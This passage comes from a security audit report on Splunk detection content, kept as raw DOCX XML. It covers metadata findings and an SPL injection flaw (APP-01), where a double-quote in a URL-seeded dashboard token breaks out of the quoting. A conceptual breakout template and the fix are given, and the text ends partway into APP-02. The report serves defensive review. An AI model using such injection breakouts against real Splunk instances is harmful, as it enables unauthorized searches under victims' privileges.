        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-2 Baseline Configuration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.19 Installation of software on operational systems. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-18 — Playbook metadata references non-existent or mismatched JSON filenames</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Not exploitable (packaging consistency).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/G_Suite_for_GMail_Message_Identifier_Activity_Analysis.yml; playbooks/Zscaler_Outbound_Traffic_Filtering.yml; playbooks/MS_Graph_for_Office_365_Search_and_Purge.json:588</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (build/packaging consistency). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: fix the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field to match the on-disk JSON basename exactly; add a CI check that every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbooks/*.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has a matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings</w:t>
      </w:r>
      <w:r>
        <w:t>: CWE-1078; OWASP A05; NIST 800-53 CM-2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1078. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-2 Baseline Configuration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.9 Configuration management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-19 — Detection identifiers unique; 127 detections with empty data_source (schema conformance otherwise clean)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Not exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/application/splunk_authentication_token_exposure_in_debug_log.yml:14; detections/cloud/aws_s3_exfiltration_behavior_identified.yml (127 files)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Facts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Across 2,169 detections + 41 baselines + 377 removed + 365 stories: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no duplicate `id` UUIDs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no duplicate `name`s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (collision would cause content overwrite — none found). All </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s are valid UUIDs except the deprecated spec doc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deprecated/yaml-spec/detection_spec.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (a template, not content). 127 production/experimental detections have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>empty `data_source: []`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/application/splunk_authentication_token_exposure_in_debug_log.yml:14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/cloud/aws_s3_exfiltration_behavior_identified.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>o365_bec_email_hiding_rule_created.yml</w:t>
      </w:r>
      <w:r>
        <w:t>) — a metadata/traceability gap, not a vuln.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: populate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the 127 detections (full list in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scratchpad/work/det/out/rules/i_empty_data_source.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings</w:t>
      </w:r>
      <w:r>
        <w:t>: CWE-1053; OWASP A09; ISO 27001 A.8.29.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1053. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID.AM Identify - Asset Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.29 Security testing in development and acceptance. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 App Template, Dashboards, Lookups and Macros</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This area produced 13 unique findings: 2 Medium, 8 Low, 3 Informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-01 — SPL injection via weakly-quoted dashboard token $story$ (ESCU summary dashboard)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.1). Exploitability: Conditionally exploitable (victim opens crafted URL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> app_template/default/data/ui/views/escu_summary.xml:157-158,177</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 6.1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app_template/default/data/ui/views/escu_summary.xml:177</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (token source: input at lines 143-160, prefix/suffix at 157-158). Excerpt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>157      &lt;prefix&gt;"&lt;/prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>158      &lt;suffix&gt;"&lt;/suffix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>177        | search analytic_story=  $story$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>story</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dropdown token is placed into an SPL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command. The only sanitization is a literal-quote </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;prefix&gt;"&lt;/prefix&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;suffix&gt;"&lt;/suffix&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wrapper. Simple XML prefix/suffix are string concatenation, not escaping: if the token value itself contains a double-quote, the attacker closes the intended quoted string and appends arbitrary SPL. Because dashboard tokens can be seeded from the URL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>?form.story=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), a victim who is tricked into clicking a crafted link runs the injected SPL with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>their own</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk role/search privileges (a CSRF-style search-under-victim pattern).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Source = URL/form token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>form.story</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Sink = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| search ... $story$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SPL parser). The prefix/suffix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is bypassable by embedding a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the supplied value, so the wrapper does not contain the value. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (requires the victim to open an attacker-crafted dashboard URL and have search privileges; no new privilege is gained beyond what the victim already holds, hence S:C / C:L / I:L for read-and-tamper of searchable data).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC (defensive description, not run against any host):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Supplying a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>story</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value that contains a double-quote closes the wrapper and begins a new piped command. Conceptually the composed search becomes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>... | search analytic_story= "&lt;value-with-embedded-quote&gt;" &lt;attacker SPL&gt; "</w:t>
      </w:r>
      <w:r>
        <w:t>. An attacker can thereby append a reporting/subsearch command to read data the victim can see (e.g. enumerate saved searches or users) or, if the victim has write-capable commands, chain a lookup-writing command. Impact is bounded by the victim's capabilities. No live exploitation was performed; the breakout is demonstrated by the fact that the token value is concatenated, not escaped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation (full fixed code + explanation):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Replace the manual prefix/suffix quoting with Splunk's built-in safe quote filter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t>, which escapes embedded quotes/backslashes so the value can never terminate the string or introduce new commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;!-- remove lines 157-158 prefix/suffix entirely, then at line 177: --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>| search analytic_story=$story|s$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$token|s$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> emits a properly double-quoted, escaped SPL string literal. Additionally, constrain the input to a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;choice&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-only dropdown (no free-text) so arbitrary values cannot be typed, and avoid seeding the token from the URL via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>form.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unless validated. Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> makes the value data, not code; the dropdown and URL-seed constraints reduce the reachable input surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 (Improper Neutralization of Special Elements in Data Query Logic); related CWE-89 family (2024 CWE Top 25 rank #3, Injection class). OWASP Top 10 2021 A03:2021 Injection. ASVS v4 5.3.4 / 5.3.6 (query/command injection defenses). ATT&amp;CK T1059 (Command and Scripting Interpreter), T1552 (search of accessible data). NIST 800-53 Rev5 SI-10 (Information Input Validation), AC-4. NIST CSF 2.0 PR.PS-06 / PR.DS. ISO 27001:2022 Annex A 8.28 (Secure coding), 8.9. SANS/CERT: CERT IDS00/neutralize injection; SANS Top 25 Injection. Language best practice: Splunk Dashboards "Token filters" documentation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> safe-quote).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 Improper Neutralization of Special Elements in Data Query Logic; CWE-89 SQL Injection (2024 CWE Top 25 #3). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059 Command and Scripting Interpreter. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, AC-4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-02 — SPL injection via unquoted $policyname$/$eventcode$ tokens with auto-run on load (AppLocker dashboard)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.1). Exploitability: Exploitable (victim opens crafted URL; auto-submit).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dashboards/applocker.json:27,163,294,303-304</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 6.1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
